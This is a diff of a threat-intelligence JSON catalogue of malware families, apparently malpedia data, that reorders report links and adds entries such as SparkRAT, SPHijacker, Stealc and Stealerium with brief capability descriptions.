- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta",
"https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "https://threatminer.org/report.php?q=Accenture-Goldfin-Security-Alert.pdf&y=2018",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
"https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
],
"synonyms": [
@@ -42593,12 +44870,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks",
"https://www.bleepingcomputer.com/news/security/chinese-hackers-abuse-vlc-media-player-to-launch-malware-loader/",
- "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks",
"https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf"
+ "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/"
],
"synonyms": [
"DelfsCake",
@@ -42615,9 +44892,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot",
- "https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/",
+ "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/",
"https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/",
- "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/"
+ "https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/"
],
"synonyms": [
"Napolar"
@@ -42632,22 +44909,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker",
- "https://twitter.com/MsftSecIntel/status/1403461397283950597",
- "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/",
- "https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction",
- "https://unit42.paloaltonetworks.com/solarmarker-malware/",
- "https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more",
- "https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1/",
- "https://www.prodaft.com/m/reports/Solarmarker_TLPWHITEv2.pdf",
- "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise",
- "https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer",
- "https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/",
"https://www.binarydefense.com/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/",
+ "https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer",
+ "https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more",
+ "https://unit42.paloaltonetworks.com/solarmarker-malware/",
+ "https://www.prodaft.com/m/reports/Solarmarker_TLPWHITEv2.pdf",
+ "https://twitter.com/MsftSecIntel/status/1403461397283950597",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "https://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/",
+ "https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction",
+ "https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/",
"https://blog.minerva-labs.com/new-iocs-of-jupyter-stealer",
"https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html",
"https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/",
+ "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/",
"https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-solarmarker"
+ "https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1/",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-solarmarker",
+ "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise"
],
"synonyms": [
"Jupyter",
@@ -42686,6 +44965,19 @@
"uuid": "2b2cffc5-bf6e-4636-a906-829c32115655",
"value": "SombRAT"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.somnia",
+ "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "907ed2ce-5407-4e4d-9b1a-596d5489b008",
+ "value": "Somnia"
+ },
{
"description": "",
"meta": {
@@ -42719,9 +45011,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sorefang",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
"https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
- "https://securelist.com/apt-trends-report-q3-2020/99204/"
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a"
],
"synonyms": [],
"type": []
@@ -42734,8 +45026,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu",
- "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east"
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
+ "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east"
],
"synonyms": [],
"type": []
@@ -42748,7 +45040,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.soul",
- "https://www.fortinet.com/blog/threat-research/unraveling-the-evolution-of-the-soul-searcher-malware"
+ "https://www.fortinet.com/blog/threat-research/unraveling-the-evolution-of-the-soul-searcher-malware",
+ "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/"
],
"synonyms": [
"SoulSearcher"
@@ -42763,15 +45056,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite",
- "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx",
- "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A",
- "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/",
"https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf",
- "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/",
- "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
"https://attack.mitre.org/wiki/Software/S0157",
"https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection"
+ "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/",
+ "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx",
+ "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn"
],
"synonyms": [
"denis"
@@ -42786,8 +45079,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf"
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
],
"synonyms": [],
"type": []
@@ -42800,11 +45093,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.spark",
- "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one",
+ "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east",
"https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign",
"https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
- "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east",
- "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/"
+ "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/",
+ "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one"
],
"synonyms": [],
"type": []
@@ -42838,6 +45131,22 @@
"uuid": "1937c3e0-569d-4eb4-b769-ae5d9cc27755",
"value": "Sparksrv"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spark_rat",
+ "https://www.sentinelone.com/labs/dragonspark-attacks-evade-detection-with-sparkrat-and-golang-source-code-interpretation/",
+ "https://blog.exatrack.com/melofee/",
+ "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/",
+ "https://github.com/XZB-1248/Spark"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "55c6dce3-650b-4f67-8b47-5f6cd0acb72c",
+ "value": "SparkRAT"
+ },
{
"description": "",
"meta": {
@@ -42893,6 +45202,19 @@
"uuid": "bd29030e-d440-4842-bc2a-c173ed938da4",
"value": "Spedear"
},
+ {
+ "description": "According to Trend Micro, this is a tool designed to disable security products, adopting two approaches to achieve this purpose. One approach terminates the security product process by using a vulnerable driver, zamguard64.sys, published by Zemana (vulnerability designated as CVE-2018-5713). Meanwhile, another approach disables process launching by using a new technique that they named stack rumbling.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sphijacker",
+ "https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "24541e4c-27b3-4a80-9dca-972f9825d36b",
+ "value": "SPHijacker"
+ },
{
"description": "",
"meta": {
@@ -42911,8 +45233,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.spider_rat",
+ "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf",
"https://twitter.com/nahamike01/status/1471496800582664193?s=20",
- "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf"
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
],
"synonyms": [],
"type": []
@@ -42925,12 +45248,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom",
- "https://github.com/MinervaLabsResearch/SporaVaccination",
- "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/",
- "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas",
- "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware",
"https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/",
- "http://malware-traffic-analysis.net/2017/01/17/index2.html"
+ "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware",
+ "https://github.com/MinervaLabsResearch/SporaVaccination",
+ "http://malware-traffic-analysis.net/2017/01/17/index2.html",
+ "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/",
+ "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas"
],
"synonyms": [],
"type": []
@@ -42955,13 +45278,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder",
+ "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
"https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/",
- "https://st.drweb.com/static/new-www/news/2021/march/BackDoor.Spyder.1_en.pdf",
+ "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques",
"https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/",
"https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive",
- "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques",
- "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf",
- "https://vms.drweb.com/virus/?i=23648386"
+ "https://vms.drweb.com/virus/?i=23648386",
+ "https://st.drweb.com/static/new-www/news/2021/march/BackDoor.Spyder.1_en.pdf",
+ "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf"
],
"synonyms": [],
"type": []
@@ -42974,18 +45298,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/",
- "https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
"https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html",
"https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/",
"http://malwareint.blogspot.com/2010/02/spyeye-bot-part-two-conversations-with.html",
- "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals",
"https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html",
- "https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot",
- "https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/"
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye",
+ "https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393",
+ "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/",
+ "https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/",
+ "https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot"
],
"synonyms": [],
"type": []
@@ -42998,30 +45322,30 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle",
- "https://www.malware-traffic-analysis.net/2021/09/17/index.html",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-newest-malicious-actor-squirrelwaffle-malicious-doc/",
- "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike",
- "https://www.sentinelone.com/blog/is-squirrelwaffle-the-new-emotet-how-to-detect-the-latest-malspam-loader/",
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://twitter.com/Max_Mal_/status/1442496131410190339",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://redcanary.com/blog/intelligence-insights-december-2021",
- "https://blogs.blackberry.com/en/2021/11/threat-thursday-squirrelwaffle-loader",
- "https://www.cynet.com/understanding-squirrelwaffle/",
- "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
- "https://certitude.consulting/blog/en/unpatched-exchange-servers-distribute-phishing-links-squirrelwaffle/",
- "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike",
- "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9",
"https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/",
- "https://www.youtube.com/watch?v=9X2P7aFKSw0",
- "https://twitter.com/jhencinski/status/1464268732096815105",
+ "https://blogs.blackberry.com/en/2021/11/threat-thursday-squirrelwaffle-loader",
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
+ "https://twitter.com/Max_Mal_/status/1442496131410190339",
+ "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike",
+ "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf",
+ "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9",
+ "https://certitude.consulting/blog/en/unpatched-exchange-servers-distribute-phishing-links-squirrelwaffle/",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/",
+ "https://www.cynet.com/understanding-squirrelwaffle/",
+ "https://redcanary.com/blog/intelligence-insights-december-2021",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.malware-traffic-analysis.net/2021/09/17/index.html",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-newest-malicious-actor-squirrelwaffle-malicious-doc/",
"https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan",
- "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html",
- "https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/",
+ "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike",
"https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot",
+ "https://www.youtube.com/watch?v=9X2P7aFKSw0",
"https://security-soup.net/squirrelwaffle-maldoc-analysis/",
- "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf"
+ "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html",
+ "https://twitter.com/jhencinski/status/1464268732096815105",
+ "https://www.sentinelone.com/blog/is-squirrelwaffle-the-new-emotet-how-to-detect-the-latest-malspam-loader/",
+ "https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/"
],
"synonyms": [
"DatopLoader"
@@ -43064,9 +45388,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf"
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/"
],
"synonyms": [],
"type": []
@@ -43079,8 +45403,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq",
- "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers",
- "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html"
+ "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html",
+ "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers"
],
"synonyms": [],
"type": []
@@ -43100,15 +45424,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "50eb8c54-5828-11e8-8d6b-232bb9329fc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8c38460b-fcfd-434e-b258-875854c6aff6",
"value": "StalinLocker"
},
@@ -43161,15 +45476,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d0220108-48d7-4056-babc-189048f37a59",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a",
"value": "StarsyPound"
},
@@ -43193,9 +45499,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stashlog",
- "https://twitter.com/ESETresearch/status/1433819369784610828",
"https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html",
"https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques",
+ "https://twitter.com/ESETresearch/status/1433819369784610828",
"https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive"
],
"synonyms": [],
@@ -43209,10 +45515,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit",
- "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool",
"https://twitter.com/r3c0nst/status/1425875923606310913",
+ "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/",
+ "https://www.accenture.com/us-en/blogs/security/stealbit-exmatter-exfiltration-tool-analysis",
"https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/"
+ "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool"
],
"synonyms": [
"Corrempa"
@@ -43222,6 +45529,34 @@
"uuid": "b98c86d4-1eee-490e-a6f9-e9559322fec8",
"value": "StealBit"
},
+ {
+ "description": "Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.\r\n\r\nStealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc",
+ "https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/",
+ "https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "58a2c661-470e-438d-bea3-bff1ed987ed2",
+ "value": "Stealc"
+ },
+ {
+ "description": "According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor’s addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium",
+ "https://github.com/Stealerium/Stealerium",
+ "https://resources.securityscorecard.com/research/stealerium-detailed-analysis"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bf71f246-7382-486d-996d-c2b7aa8cf89b",
+ "value": "Stealerium"
+ },
{
"description": "According to PTSecurity, this stealer harvests system information which is then RC4 encrypted and Base64 encoded before sending it to the C2 server.",
"meta": {
@@ -43237,7 +45572,7 @@
"value": "Stealer0x3401"
},
{
- "description": "",
+ "description": "According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their target’s backend. Hacker’s commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target’s system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker",
@@ -43293,12 +45628,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stonedrill",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
"https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage"
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
@@ -43311,23 +45647,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stop",
- "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
- "https://github.com/vithakur/detections/blob/main/STOP-ransomware-djvu/IOC-list",
- "https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/",
- "https://malienist.medium.com/defendagainst-ransomware-stop-c8cf4116645b",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
"https://securelist.com/keypass-ransomware/87412/",
- "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
"https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/",
- "https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads",
- "https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/",
+ "https://malienist.medium.com/defendagainst-ransomware-stop-c8cf4116645b",
+ "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
"https://angle.ankura.com/post/102het9/the-stop-ransomware-variant",
